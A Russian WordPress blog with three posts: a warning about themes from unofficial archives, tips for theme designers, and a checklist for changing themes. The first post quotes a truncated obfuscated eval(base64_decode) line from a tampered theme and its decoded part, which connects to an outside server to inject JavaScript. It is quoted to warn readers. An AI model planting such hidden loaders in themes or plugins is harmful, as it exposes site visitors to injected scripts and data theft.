Блог о WordPress от Тараса

Вдогонку к предыдущему посту о темах, взгляд с другой стороны, а если быть точным, то пост для тех самых пользователей, которые все эти темы качают.

Вообще, в последнее время очень сильно повысилось количество постов о взломе разных блогов на WordPress’е, а всё потому, что люди забывают обновляться до последней версии. Но даже наличие последней стабильной версии с офф.сайта не даёт гарантий, что вас не “поимеют”.

Недавно на глаза попался пост о интересном способе, который применяют хакеры для получения информации о сайте.

Для тех, кто не очень дружит с ангельским языком, расскажу вкратце о чём там речь:
Некий дизайнер Derek Punsalan сделал темку (а точнее даже несколько) для WordPress и решил их подарить всему миру. В итоге она разлетелась по куче разных тематических архивов, одним из которых был WpSphere. И что вы думаете?

После скачивания и установки с этого сайта, некоторые пользователи заметили, что в тексте страниц находится примерно такой код

@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\...

Если вы не разбирается в PHP, поясню - такой метод применяется, чтобы скрыть реальный исполняемый код, потому что после декодирования (функция, base64_decode), текст будет выглядеть несколько более подозрительно

if($R37C014DAE5FE4FE5C77B6735ABC30916 =
@fsockopen("www.wpssr.com", 80,
$R32D00070D4FFBCCE2FC669BBA812D4C2,
$R5F525F5B398DADD7CF0784BD406298E3, 3))
$R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr";...

В результате выполнения этого скрипта, с одного из серверов (я указал лишь часть исходника) подгружался java-script. По словам одного из блоггеров, Пола Кэрола, который проводил исследования по поводу “вредоносности” данного кода, выходит, что ничего плохого не происходило, а Wp-Sphere просто мониторили количество установок тем.

Только вот, несмотря на это, что-то уж через чур большая дыра в безопасности получается, ведь внедряя ява-скрипт на страницу, злоумышленники могут без проблем крутить рекламу, а что более скверно - получить информацию, сохраненную в браузере.

Весь этот пост написан для того, чтобы вы задумались перед установкой очередной темы, скаченой из не проверенных источников. Или, во всяком случае, проверили, что там у неё внутри, а если не можете сами (по причине, что любой код для вас - набор бессмысленных знаков), то попросите того, кто понимает, можно и меня.

И напоследок, к проверенным источникам с лёгкостью могу отнести сайт themes.wordpress.net, ибо официальный, а так же советую ознакомиться с “Кратким руководством по безопасности WordPress” от Максима, скоро постараюсь опубликовать не краткое, а большое и разностороннее.

Мира вам и безопасного интернета и WordPress.

Пост посвящается всем дизайнерам и верстальщикам тем под WordPress.

Порой я впадаю в уныние от того, что дизайнер из меня никакой, а вёрстка не приносит радости, а только нервный тик. Особенно когда подгонишь всё качественно в FireFox, а потом посмотришь на сайт в IE. Сидишь и тихо всхлипываешь.
К чему я это пишу? А к тому, что умей я быстро и качественно делать темы для ВордПресса, то вполне возможно имел бы ого-го сколько бэклинков, ведь никто не мешает вставить ссылку на себя в футере.
Если глянуть на статистику того же themes.wordpress.net, то в топе темы с количеством скачиваний от 10000 и больше, и если даже прикинуть, что лишь 1/10 из них будет установлена, то… 1000 сайтов с бэклинками С КАЖДОЙ СТРАНИЦЫ. А что если сайт ещё и популярным будет?
Причём, что самое приятное, затраты на это минимальные - сделать тему, разместить её в разных базах и всё - сиди, жди пока скачают. А теперь дам несколько советов, которые позволят повысить количество скачиваний и качество тем.

Бесплатно и только бесплатно.
Некоторые дизигнеры считают, что раз они тратили время на создание темы, то надо требовать денежку за скачивание. Это довольно глупо, учитывая то разнообразие бесплатных тем, которые лежат в интернете в свободном доступе.

Нестандартный подход.
Частенько ВордПресс обвиняют в том, что сайты, сделанные на нём, выглядят все совершенно одинаково. Ещё бы, ведь большинство т.н. дизайнеров не заморачиваются, а просто редактируют стандартную тему (может слышали такое название - Kubrick). Придумайте что-нибудь новое и нестандартное, такое, чтобы при первом же взгляде на превьюшку хотелось бы “потыкать” сайт.
Отличным примером темы “не как все” является не безызвестный сайт http://browsehappy.com/. А ведь и не скажешь с первого взгляда, что это WordPress.

Создавайте тематические темы.
Не пытайтесь сделать абстрактную тему “для всех”, если вы хотите, чтобы ваше творение не только скачивали, но и использовали, то узкая тематика подойдёт для этого как нельзя лучше. Я, например, не нашёл ни одной темы для WordPress по Гарри Поттеру, а ведь, при таком количестве фанатов и посвещенных ему блогов, тема была бы ОЧЕНЬ популярна. Подумайте об этом:-)
Или сезонные темы, а так же темы к таким праздникам как Рождество/Новый год, их точно будут качать, главное чтобы они были в доступе к нужному моменту.

Не используйте дешевый клипарт.
И тут не столько дело в деньгах, сколько в качестве применяемых в теме картинок. Печально лицезреть хорошо свёрстанную тему, в которой изображения в хэдере не чёткие или пестрят пикселами. Изучите хорошенько, какие форматы сжатия изображений для чего лучше подходят, ведь мы же хотим, чтобы пользователь дождался загрузки страницы.

Старайтесь не применять в своей теме плагины.
Да, порой хочется расширить функционал своей темы за счёт плагинов, но не забывайте, что у пользователя, который собирается использовать её, вашего набора плагинов скорее всего не будет. С другой стороны это не мешает вам подготовить свою тему так, чтобы при активации определенных плагинов она адекватно на это реагировала. Делается это простой проверкой в коде темы и соответственно вывод дополнительного кода. Очень удобно при работе с популярными плагинами, которые можно стилизовать под тему, например тот же Wp-PageNavi. Главное, чтобы это было “прозрачно” для конечного пользователя и являлось “приятным дополнением”, а не принуждало что-то ещё скачивать.

Вкладывайте в тему исходник дизайна.
Если вы облегчите перерисовку некоторых элементов “под себя”, то шансы увидеть бэклинки повышаются. Не обязательно выкладывать psd всего дизайна целиком, а вот такие элементы, как логотип, фоновые изображения и т.п. можно положить в отдельную папку в теме. Люди будут благодарны, уж поверьте мне, сам радуюсь, если нахожу исходники отдельных элементов в архиве.

Сделайте тему на нескольких языках.
Обычно в темах не так много элементов, которые требуют перевода, и для знающего человека перевод занимает от силы полчаса времени. Только вот таких вот знающих людей обычно не так много. А обычный пользователь сразу же впадает в ступор, когда при активации темы, видит текст на не родном языке. Я сужу об этом по количеству топиков с вопросом: “а как мне перевести тему”/”локализуйте мне тему” на разных форумах.
Если вы заранее позаботитесь об этом, то многократно увеличите количество загрузок. Причём, все текстовые элементы в 90% случаев одинаковы во всех темах, поэтому можно сделать заготовку из .MO файлов на разных языках и вкладывать их в архив.

Будьте разнообразнее в оформлении и цветовой гамме.
Сейчас во всём популярен минимализм, в том числе и в цветовом оформлении. В большинстве своём на глаза попадаются темы в чёрно-белых или сине-голубых тонах. Это же скучно. Сделайте качественную розовую тему с цветочками, и изрядное количество блоггерш-домохозяек будут вам благодарны, а уж они то точно не знают, как убрать из футера ваш бэклинк Согласитесь, данный сайт выглядит более чем приятно.

Осторожнее со спонсорством.
Пару раз попадались темы с уже встроенными блоками адсенса автора. Смеялся долго, вырезая их из исходников. Во-первых, где-то слышал, что гугл вполне может забанить аккаунт, если клики приходят с неизвестных сайтов, а во-вторых, ну имейте же совесть.
И не следует в футер пихать по 10 ссылок, в надежде поднять выдачу разным своим проектам. Такие блоки со 100% вероятностью будут стёрты, так что вы не получите даже ссылки на себя. Будьте скромнее и довольствуйтесь малым… в больших количествах.

Проверьте тему в популярных браузерах.
Это очень важный момент, о котором многие забывают. Не обязательно впадать в истерию и тестировать её во всех существующих браузерах, достаточно четырёх: IE6, IE7, FireFox и Opera. Или воспользуйтесь сервисом http://www.browsershots.org/.

Разместите тему в каталогах.
Мало выложить тему у себя в блоге, нужно ещё и оповестить популярные (и не очень) каталоги тем об этом. Большинство из них можно найти, просто введя в гугле фразу wordpress themes. Если в каталоге нет свободной возможности добавить тему, то отправьте её по почте администратору, ведь размещение новых интересных тем не только в ваших интересах, но в интересах каталога.
При регистрации укажите в названии наиболее популярные слова, связанные с тематикой, а так же регистрируйтесь сразу в нескольких категориях, чтобы с максимальной вероятностью попадать в выдачу.

Не забудьте сделать скриншот.
Когда я вижу в предпросмотре “Screenshot is not available”, то я даже не кликаю на ссылку demo, чтобы посмотреть, как тема выглядит в действии. Тоже самое касается и картинок, где вместо превьюшки просто написано название темы. Когда я выбираю тему, то хочу хотя бы примерно представлять, что увижу, а не тратить время понапрасну.

Не забывайте обновлять темы.
В WordPress 2.3 появились встроенные тэги, отличный повод подновить тему, и добавить в описание Wordpress 2.3 ready или tags included. Вообще, чем полнее описание и количество “фич” в нём указано, тем лучше.

---

Ну вот собственно и всё, что мне пришло в голову. Если вы делаете качественные темы, то можете оставлять ссылки в комментариях, вдруг мне приглянется, обещаю в таком случае оставить на вас ссылку;-)

В последнее время приходится периодически править чужие темы, что натолкнуло на мысль - составить список тех вещей, которые необходимо выполнить, чтобы новая тема работала так же как и старая - на все 100%. К тому же, надеюсь (в который уже раз даю себе обещание) сменить тему в своём блоге на нечто более живописное.

Так же этот список может пригодиться тем из пользователей WordPress, которые любят менять тему в соответствии с сезоном или праздниками (а ведь Новый Год на носу), сам я этим не страдаю, но знаю, что существуют и такие индивиды.

1. Удостоверьтесь, что весь перевод (если вы его делали) сохранен в кодировке блога, а то печально наблюдать крякозябры в перемешку с нормальным текстом.

2. Перенесите свои спец. виджеты из старой темы (код из файла function.php) в новую, проверив чтобы названия виджетов не дублировались.

3. Заново разместить все свои виджеты в сайдбаре(-ах), указав необходимые настройки.
3 и 4 пункты - если вы используете тему с динамическим сайдбаром, если же нет, то правим прямо sidebar.php

4. Переносим функции, которые размещали для правильной работы плагинов. Например, тот же Wp-PageNavi, WP-RelatesPosts, ну и в том же духе.

5. Вставляем в хэдер или футер коды своих “счётчиков/анализаторов” (liveinternet/google-analystic), чтобы потом не удивляться резкому падению посещаемости до 0.
Для пользователей аналистика советую плагин Google Analyticator, который кроме автоматического внедрения нужного кода в хэдер, ещё и позволяет исключать определенных пользователей. Ведь вам же не нужно считать свои собственные клики?

6. Проверяем правильно ли прописан фид, если вы перешли на FeedBurner, т.к. ссылка по умолчанию будет на www.сайт.ру/feed.
Мой вам совет, чтобы не морочить себя пунктом 6, воспользуйтесь плагином Feedburner Feed Replacement, который автоматически редиректит все обращения к вашему фиду на фидбёрнер.

7. Монетизирующим блог напомню перенести коды от своих контекстных (и не только) программ в новую тему, хотя и тут можно обойтись использованием правильных плагинов. Возможно напишу потом об этом отдельно. И не забудьте повесить баннеры и проплаченные ссылки, а то на вас обидятся рекламодатели.

8. Протестируйте свою тему - пройдитесь по всем разделам, поищите через поиск, проверьте, чтобы текст был грамотно написан, коментарии оставлялись, а плагины не выдавали ошибок, а фид вёл туда куда нужно. Причём советую перед тестом разлогиниться, так как большинство фич (та же капча) видны только гостям.

9. Проверьте как ваш сайт отображается в разных браузерах. И если у вас на компьютере стоит, например, только IE (вздрогнул при мысли об этом), то воспользуйтесь сервисом http://www.browsershots.org/.

10. Оповестите читателей об этом знаменательном событии. Ведь многие читают вас исключительно по rss и не смогут оценить изменений. Так же попросите посетителей оставлять свои замечания и сообщать вам о найденных ошибках в комментариях к новости или в письмах. Обратная связь - полезная возможность, которой не стоит пренебрегать.

---

Ну вот и всё. Надеюсь, что следуя данному списку вы сэкономите себе и время, и нервы, а ваши посетители будут обрадованы красотой и функциональностью блога.